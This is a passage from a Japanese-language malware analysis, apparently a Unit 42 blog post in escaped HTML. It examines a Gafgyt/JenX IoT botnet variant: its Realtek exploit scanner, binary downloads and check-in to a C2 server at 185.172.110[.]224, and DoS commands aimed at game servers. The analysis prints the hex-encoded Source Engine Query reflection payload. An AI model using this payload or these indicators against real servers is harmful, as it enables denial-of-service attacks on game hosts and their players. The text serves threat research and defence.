monospace;\">realtekscanner_scanner_init()<\/span>\u95a2\u6570\u5185\u3067\u898b\u3064\u304b\u308a\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100626\" aria-describedby=\"caption-attachment-100626\" style=\"width: 709px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100626 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png\" alt=\"\u56f34 realtekscanner_scanner_init()\u3067\u767a\u898b\u3055\u308c\u305fRealtek\u7528\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\" width=\"709\" height=\"303\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1.png 709w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1-300x128.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-4.-Realtek-exploit-found-on-realtekscanner_scanner_init-1-370x158.png 370w\" sizes=\"(max-width: 709px) 100vw, 709px\" \/><\/a><figcaption id=\"caption-attachment-100626\" class=\"wp-caption-text\">\u56f34 realtekscanner_scanner_init()\u3067\u767a\u898b\u3055\u308c\u305fRealtek\u7528\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8<\/figcaption><\/figure>\n<h4>\u611f\u67d3<\/h4>\n<p>\u3053\u306e<em>JenX <\/em>\u4e9c\u7a2e\u306f\u3001\u524d\u8ff0\u306e\u30b9\u30ad\u30e3\u30ca\u95a2\u6570\u3092\u4f7f\u7528\u3057\u3066\u611f\u67d3\u5bfe\u8c61\u30de\u30b7\u30f3\u3092\u898b\u3064\u3051\u3001wget\uff08Web\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30b3\u30f3\u30c6\u30f3\u30c4\u3092\u53d6\u5f97\u3059\u308b\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u30d7\u30ed\u30b0\u30e9\u30e0\uff09\u3092\u4f7f\u3044\u3001\u898b\u3064\u3051\u305f\u30de\u30b7\u30f3\u306e\u7a2e\u985e\u306b\u5fdc\u3058\u3066ARM7\u306a\u3044\u3057MIPS\u306e\u30d0\u30a4\u30ca\u30ea\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059\u3002<\/p>\n<p><figure id=\"attachment_100628\" aria-describedby=\"caption-attachment-100628\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100629 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png\" alt=\"\u56f35 \u30d0\u30a4\u30ca\u30ea\u306e\u30c9\u30ed\u30c3\u30d7\u306b\u4f7f\u308f\u308c\u308b185.172.110[.]224\/mips\u3068185.172.110[.]224\/arm7\" width=\"600\" height=\"91\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7.png 669w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7-300x46.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-5.-Binary-dropping-185172110224-mips-and-185.172.110224-arm7-370x56.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100628\" class=\"wp-caption-text\">\u56f35 \u30d0\u30a4\u30ca\u30ea\u306e\u30c9\u30ed\u30c3\u30d7\u306b\u4f7f\u308f\u308c\u308b185.172.110[.]224\/mips\u3068185.172.110[.]224\/arm7<\/figcaption><\/figure>\u4fb5\u5bb3\u30c7\u30d0\u30a4\u30b9\u4e0a\u3067\u5b9f\u884c\u958b\u59cb\u3057\u305f\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u30d0\u30a4\u30ca\u30ea\u306e\u30c9\u30ed\u30c3\u30d1\u30fc\u30b5\u30fc\u30d0\u30fc\u3067\u3082\u3042\u308bC2\u30b5\u30fc\u30d0\u30fc\u306b\u63a5\u7d9a\u3057\u3066\u30c7\u30d0\u30a4\u30b9\u60c5\u5831\u3092\u9001\u4fe1\u3057\u3001\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u53c2\u52a0\u3057\u307e\u3059\u3002<\/p>\n<p><figure id=\"attachment_100634\" aria-describedby=\"caption-attachment-100634\" style=\"width: 732px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100634 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png\" alt=\"\u56f36 185.172.110[.]224\u3067\u7a3c\u50cd\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc\u306b993\/tcp\u3067\u63a5\u7d9a \" width=\"732\" height=\"138\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1.png 732w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1-300x57.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-6.-Connecting-to-a-C2-server-at-185.172.110.224-on-TCP-port-993-1-370x70.png 370w\" sizes=\"(max-width: 732px) 100vw, 732px\" \/><\/a><figcaption id=\"caption-attachment-100634\" class=\"wp-caption-text\">\u56f36 185.172.110[.]224\u3067\u7a3c\u50cd\u3059\u308bC2\u30b5\u30fc\u30d0\u30fc\u306b993\/tcp\u3067\u63a5\u7d9a<\/figcaption><\/figure>\u3053\u306e\u3068\u304d\u611f\u67d3\u30c7\u30d0\u30a4\u30b9\u306f\u3001IP\u30a2\u30c9\u30ec\u30b9\u3084\u30a2\u30fc\u30ad\u30c6\u30af\u30c1\u30e3\u306a\u3069\u81ea\u8eab\u306b\u95a2\u3059\u308b\u60c5\u5831\u3092C2\u30b5\u30fc\u30d0\u30fc\u306b\u9001\u4fe1\u3057\u307e\u3059\u3002\u5f15\u6570\u3068\u3057\u3066\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u540d\u524d\u304c\u6e21\u3055\u308c\u306a\u304b\u3063\u305f\u5834\u5408\u3001\u611f\u67d3\u30c7\u30d0\u30a4\u30b9\u306b\u306f<em>Unknown<\/em>\u3068\u3044\u3046\u540d\u524d\u304c\u4ed8\u3051\u3089\u308c\u307e\u3059\u3002\u3053\u306e\u5f8cC2\u30b5\u30fc\u30d0\u30fc\u306f <em>PING<\/em>\u30b3\u30de\u30f3\u30c9<em>\u3067\u5fdc\u7b54\u3057\u307e\u3059\u3002<\/em><\/p>\n<figure id=\"attachment_100636\" aria-describedby=\"caption-attachment-100636\" style=\"width: 600px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100637 lozad\"  data-src=\"https:\/\/unit42-preview.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png\" alt=\"\u56f37 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u53c2\u52a0\u3059\u308b\u30c7\u30d0\u30a4\u30b9\u306b\u540d\u524d\u3092\u5272\u308a\u5f53\u3066\u308b\" width=\"600\" height=\"378\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet.png 544w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet-300x189.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-Assigning-a-name-to-the-device-to-join-the-botnet-370x233.png 370w\" sizes=\"(max-width: 600px) 100vw, 600px\" \/><\/a><figcaption id=\"caption-attachment-100636\" class=\"wp-caption-text\">\u56f37 \u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u53c2\u52a0\u3059\u308b\u30c7\u30d0\u30a4\u30b9\u306b\u540d\u524d\u3092\u5272\u308a\u5f53\u3066\u308b<\/figcaption><\/figure>\n<figure id=\"attachment_100638\" aria-describedby=\"caption-attachment-100638\" style=\"width: 742px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100638 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response.png\" alt=\"\u56f37 C2\u304b\u3089\u306e\u5fdc\u7b54\" width=\"742\" height=\"185\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response.png 742w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response-300x75.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-7.-C2-response-370x92.png 370w\" sizes=\"(max-width: 742px) 100vw, 742px\" \/><\/a><figcaption id=\"caption-attachment-100638\" class=\"wp-caption-text\">\u56f37 C2\u304b\u3089\u306e\u5fdc\u7b54<\/figcaption><\/figure>\n<p>\u30c7\u30d0\u30a4\u30b9\u304c\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u53c2\u52a0\u3059\u308b\u3068\u3001\u3055\u307e\u3056\u307e\u306a\u7a2e\u985e\u306eDoS\u653b\u6483\u3092\u5b9f\u884c\u3059\u308b\u30b3\u30de\u30f3\u30c9\u306e\u53d7\u4fe1\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30b3\u30de\u30f3\u30c9\u306b\u3064\u3044\u3066\u6b21\u7bc0\u4ee5\u964d\u3067\u8aac\u660e\u3057\u307e\u3059\u3002<\/p>\n<h4>DoS\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3<\/h4>\n<p>\u3053\u306eGafgyt\u4e9c\u7a2e\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u53d7\u4fe1\u3057\u305f\u30b3\u30de\u30f3\u30c9\u306b\u5fdc\u3058\u3001\u3055\u307e\u3056\u307e\u306aDoS\u653b\u6483\u3092\u540c\u6642\u306b\u5b9f\u884c\u3067\u304d\u307e\u3059\u3002\u30de\u30eb\u30a6\u30a7\u30a2\u306e<span style=\"font-family: 'courier new', courier, monospace;\">main()<\/span>\u95a2\u6570\u306f\u5225\u306e\u95a2\u6570<span style=\"font-family: 'courier new', courier, monospace;\">processCmd()<\/span>\u3092\u547c\u3073\u51fa\u3057\u3066\u30b3\u30de\u30f3\u30c9\u3092\u51e6\u7406\u3057\u3001\u5bfe\u5fdc\u3059\u308b\u653b\u6483\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u4ee5\u4e0b\u306f\u3001\u7279\u5b9a\u3055\u308c\u305f\u91cd\u8981\u306a\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3\u306e\u4e00\u90e8\u3067\u3059\u3002<\/p>\n<ul>\n<li>HTTP: <span style=\"font-family: 'courier new', courier, monospace;\">SendHTTP()<\/span>\u95a2\u6570\u3092\u547c\u3073\u51fa\u3057\u3066HTTP\u30d5\u30e9\u30c3\u30c9\u653b\u6483\u3092\u958b\u59cb\u3057\u307e\u3059\u3002\u3053\u306e\u95a2\u6570\u306f\u3001\u653b\u6483\u5b9f\u884c\u7528\u306b6\u3064\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u30fc\uff08http\u30e1\u30bd\u30c3\u30c9\u3001\u30bf\u30fc\u30b2\u30c3\u30c8\u30db\u30b9\u30c8\u3001\u30dd\u30fc\u30c8\u3001\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u3001\u7d42\u4e86\u6642\u9593\u3001\u7e70\u308a\u8fd4\u3057\u56de\u6570\uff09\u3092\u53d7\u3051\u53d6\u308a\u307e\u3059\u3002\u3053\u306e\u307b\u304b\u3001\u30d7\u30ed\u30b0\u30e9\u30e0\u3067\u5b9a\u7fa9\u3055\u308c\u305fUser-Agent\u306e1\u3064\u3092\u30e9\u30f3\u30c0\u30e0\u306b\u4f7f\u7528\u3057\u3066\u653b\u6483\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002<\/li>\n<li>HTTPHex: HTTP\u306b\u985e\u4f3c\u3057\u305f\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3\u3067\u3001<span style=\"font-family: 'courier new', courier, monospace;\">SendHTTPHex()<\/span>\u95a2\u6570\u3092\u547c\u3073\u51fa\u3057\u307e\u3059\u3002<span style=\"font-family: 'courier new', courier, monospace;\">SendHTTPHex()<\/span>\u95a2\u6570\u306f<span style=\"font-family: 'courier new', courier, monospace;\">SendHTTP()<\/span>\u95a2\u6570\u3068\u540c\u3058\u30d1\u30e9\u30e1\u30fc\u30bf\u3092\u8981\u6c42\u3057\u307e\u3059\u304c\u3001\u901a\u5e38\u306e\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\uff08\/index.html\u306a\u3069\uff09\u306e\u4ee3\u308f\u308a\u306b\u30b4\u30df\u30c7\u30fc\u30bf\u306e\u5165\u3063\u305f16\u9032\u6570\u914d\u5217\u3092\u4f7f\u7528\u3057\u3066\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u30ea\u30bd\u30fc\u30b9\u3092\u6d88\u8cbb\u3057\u3001\u67af\u6e07\u3055\u305b\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/li>\n<li>HTTPCF: Cloudflare\u304c\u4fdd\u8b77\u3059\u308b\u30b5\u30fc\u30d3\u30b9\u306b\u5bfe\u3059\u308b\u653b\u6483\u3092\u884c\u3044\u307e\u3059\u3002<\/li>\n<li>KILLER &amp; KILLATTK: \u4eee\u306b\u611f\u67d3\u30c7\u30d0\u30a4\u30b9\u4e0a\u306b\u3059\u3067\u306b\u7af6\u5408\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u304c\u5b58\u5728\u3057\u3066\u3044\u308c\u3070\u305d\u308c\u3092\u524a\u9664\u3057\u307e\u3059\u3002<\/li>\n<li>VSE: Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u542b\u307f\u307e\u3059\u3002<\/li>\n<\/ul>\n<figure id=\"attachment_100643\" aria-describedby=\"caption-attachment-100643\" style=\"width: 740px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100643 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload.png\" alt=\"\u56f38 \u4eca\u56de\u306eGafgyt\u4e9c\u7a2e\u3067\u6700\u3082\u6ce8\u76ee\u3059\u3079\u304d\u30b3\u30de\u30f3\u30c9\" width=\"740\" height=\"156\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload.png 740w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-300x63.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-370x78.png 370w\" sizes=\"(max-width: 740px) 100vw, 740px\" \/><\/a><figcaption id=\"caption-attachment-100643\" class=\"wp-caption-text\">\u56f38 \u4eca\u56de\u306eGafgyt\u4e9c\u7a2e\u3067\u6700\u3082\u6ce8\u76ee\u3059\u3079\u304d\u30b3\u30de\u30f3\u30c9<\/figcaption><\/figure>\n<h4>\u4f9d\u7136\u72d9\u308f\u308c\u308b\u30b2\u30fc\u30e0\u696d\u754c<\/h4>\n<p>\u524d\u8ff0\u306e\u3088\u3046\u306b\u3001 <em>VSE<\/em>\u30b3\u30de\u30f3\u30c9\u306f\u3001Valve\u306eSource Engine\u3092\u63a1\u7528\u3059\u308b\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u306b\u5bfe\u3059\u308b\u653b\u6483\u3092\u958b\u59cb\u3059\u308b\u3082\u306e\u3067\u3059\u3002Source Engine\u3092\u30a8\u30f3\u30b8\u30f3\u3068\u3057\u3066\u4f7f\u3046\u30b2\u30fc\u30e0\u306b\u306f\u3001<em>Half-Life<\/em>\u3084<em>Team Fortress 2<\/em>\u304c\u3042\u3052\u3089\u308c\u307e\u3059\u3002\u306a\u304a\u3001\u3053\u308c\u306fValve Corporation\u81ea\u4f53\u306b\u5bfe\u3059\u308b\u653b\u6483\u3067\u306f\u306a\u3044\u70b9\u306b\u6ce8\u610f\u3057\u3066\u304f\u3060\u3055\u3044\u3002\u81ea\u524d\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306bSource Engine\u3092\u63a1\u7528\u3057\u305f\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u7acb\u3066\u308b\u3053\u3068\u306f\u8ab0\u306b\u3067\u3082\u3067\u304d\u307e\u3059\u3057\u3001\u3053\u3053\u3067\u8aac\u660e\u3059\u308b\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3\u306f\u3001\u3053\u308c\u3089\u306e\u30b5\u30fc\u30d0\u30fc\u306b\u5bfe\u3059\u308b\u653b\u6483\u306e\u305f\u3081\u306e\u3082\u306e\u3067\u3059\u3002\u4ee5\u4e0b\u306f\u3001Source Engine\u3092\u4f7f\u3046\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u306e\u653b\u6483\u7528\u306b\u4f7f\u7528\u3055\u308c\u308b\u30da\u30a4\u30ed\u30fc\u30c9\u3067\u3059\u3002<\/p>\n<pre class=\"lang:default decode:true\">TSource Engine Query + \r\n\/x54\/x53\/x6f\/x75\/x72\/x63\/x65\/x20\/x45\/x6e\/x67\/x69\/x6e\/x65\/x20\/x51\/\r\nx75\/x65\/x72\/x79 rfdknjms<\/pre>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6b21\u306e\u5185\u5bb9\u306b\u30c7\u30b3\u30fc\u30c9\u3055\u308c\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100645\" aria-describedby=\"caption-attachment-100645\" style=\"width: 740px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100645 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png\" alt=\"\u56f39 \u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305fTSource Engine Query\u306e\u30da\u30a4\u30ed\u30fc\u30c9\" width=\"740\" height=\"156\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1.png 740w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1-300x63.png 300w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-9.-Decoded-TSource-Engine-Query-payload-1-370x78.png 370w\" sizes=\"(max-width: 740px) 100vw, 740px\" \/><\/a><figcaption id=\"caption-attachment-100645\" class=\"wp-caption-text\">\u56f39 \u30c7\u30b3\u30fc\u30c9\u3055\u308c\u305fTSource Engine Query\u306e\u30da\u30a4\u30ed\u30fc\u30c9<\/figcaption><\/figure>\n<p>\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306fDoS\u30ea\u30d5\u30ec\u30af\u30b7\u30e7\u30f3\u653b\u6483\uff08DRDoS\uff09\u3092\u5f15\u304d\u8d77\u3053\u3059\u305f\u3081\u306b\u3088\u304f\u5229\u7528\u3055\u308c\u308b\u3082\u306e\u3067\u3001DRDoS\u653b\u6483\u3067\u306f\u3001\u8907\u6570\u306e\u611f\u67d3\u30de\u30b7\u30f3\u3092\u610f\u56f3\u305b\u305aDDoS\u653b\u6483\u306b\u53c2\u52a0\u3055\u305b\u307e\u3059\u3002<em>Source Engine Query<\/em>\u3068\u3044\u3046\u306e\u306f\u3001Valve\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\u30d7\u30ed\u30c8\u30b3\u30eb\u3092\u4f7f\u7528\u3059\u308b\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\/\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u9593\u3067\u3084\u308a\u53d6\u308a\u3055\u308c\u308b\u5b9a\u671f\u7684\u901a\u4fe1\u306e1\u3064\u3067\u3059\u3002\u611f\u67d3\u30db\u30b9\u30c8\u30de\u30b7\u30f3\u3078\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u306f\u3001\u611f\u67d3\u30db\u30b9\u30c8\u304b\u3089\u30bf\u30fc\u30b2\u30c3\u30c8\u30db\u30b9\u30c8\u306b\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\uff08\u30ea\u30d5\u30ec\u30af\u30c8\uff09\u3055\u308c\u3001\u3053\u306e\u7d50\u679c\u3001\u653b\u6483\u30c8\u30e9\u30d5\u30a3\u30c3\u30af\u91cf\u304c\u5897\u5e45\u3055\u308c\u3001\u30bf\u30fc\u30b2\u30c3\u30c8\u30db\u30b9\u30c8\u306b\u5bfe\u3059\u308b\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u653b\u6483\u304c\u767a\u751f\u3057\u307e\u3059\u3002<\/p>\n<p>\u3053\u306e\u307b\u304b\u3001VSE\u4ee5\u5916\u306eDoS\u653b\u6483\u30aa\u30d7\u30b7\u30e7\u30f3\u3092\u4f7f\u7528\u3057\u3001\u653b\u6483\u8005\u306f\u4ed6\u306b\u3082Fortnite\u306a\u3069\u5e83\u304f\u30d7\u30ec\u30a4\u3055\u308c\u3066\u3044\u308b\u30b2\u30fc\u30e0\u3092\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u3057\u3066\u3044\u308b\u30b5\u30fc\u30d0\u30fc\u3082\u6a19\u7684\u306b\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h4>SNS\u304c\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30de\u30fc\u30b1\u30c3\u30c8\u30d7\u30ec\u30a4\u30b9\u306b<\/h4>\n<p>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u898b\u3064\u304b\u3063\u305f\u653b\u6483\u306e1\u3064\u306b\u3001\u540c\u4e00\u30c7\u30d0\u30a4\u30b9\u306b\u5b58\u5728\u3059\u308b\u7af6\u5408\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3092\u63a2\u3057\u3066kill\u3057\u3088\u3046\u3068\u3059\u308b\u3082\u306e\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001Gafgyt\u3092\u611f\u67d3\u30c7\u30d0\u30a4\u30b9\u304c\u53c2\u52a0\u3059\u308b\u552f\u4e00\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u305f\u3081\u306bGafgyt\u306f\u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u4e9c\u7a2e\u306b\u5b58\u5728\u3059\u308b\u7279\u5b9a\u306e\u30ad\u30fc\u30ef\u30fc\u30c9\u3084\u30d0\u30a4\u30ca\u30ea\u540d\u3092\u63a2\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30ad\u30fc\u30ef\u30fc\u30c9\u3068\u30d0\u30a4\u30ca\u30ea\u306f<strong><em>bin_names<\/em><\/strong>\u3001<strong><em>bin_strings<\/em><\/strong>\u3068\u3044\u30462\u3064\u306e\u7d44\u306b\u5206\u3051\u3089\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_100647\" aria-describedby=\"caption-attachment-100647\" style=\"width: 514px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png\" rel=\"wpdevart_lightbox\"><img  class=\"wp-image-100647 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png\" alt=\"\u56f310 \u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u5b58\u5728\u3059\u308b\u30d0\u30a4\u30ca\u30ea\u540d\u3084\u90e8\u5206\u6587\u5b57\u5217\" width=\"514\" height=\"640\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets.png 514w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets-241x300.png 241w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2019\/10\/Figure-10.-Binary-names-and-substrings-present-in-other-IoT-botnets-370x461.png 370w\" sizes=\"(max-width: 514px) 100vw, 514px\" \/><\/a><figcaption id=\"caption-attachment-100647\" class=\"wp-caption-text\">\u56f310 \u4ed6\u306eIoT\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u5b58\u5728\u3059\u308b\u30d0\u30a4\u30ca\u30ea\u540d\u3084\u90e8\u5206\u6587\u5b57\u5217<\/figcaption><\/figure>\n<p>\u8b58\u5225\u3067\u304d\u305f\u306a\u304b\u3067\u8208\u5473\u6df1\u304b\u3063\u305f\u6587\u5b57\u5217\u304c<span style=\"font-family: 'courier new', courier, monospace;\"><em>chinese family<\/em><\/span>\u3067\u3059\u3002\u3053\u306e\u6587\u5b57\u5217\u306f\u3001Gafgyt\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u524d\u8eab\u3068\u306a\u3063\u305f<em>JenX<\/em>\u306b\u95a2\u9023\u3057\u3066\u3044\u307e\u3059\u3002JenX\u306f\u3001Grand Theft Auto: San Andreas\u3068\u3044\u3046\u30b2\u30fc\u30e0\u306e\u30db\u30b9\u30c6\u30a3\u30f3\u30b0\u30b5\u30fc\u30d0\u30fc\u3092\u6a19\u7684\u306b\u3059\u308bSan Calvicie\u3068\u3044\u3046\u30cf\u30c3\u30ab\u30fc\u30b0\u30eb\u30fc\u30d7\u304c\u62e1\u6563\u3057\u3066\u3044\u305f\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u3067\u3059\u304c\u3001\u3053\u306e<em>JenX<\/em>\u304c<\/p>\n<p style=\"padding-left: 40px;\"><span style=\"font-family: 'courier new', courier, monospace;\"><em>gosh that <strong>chinese family<\/strong> at the other table sure ate a 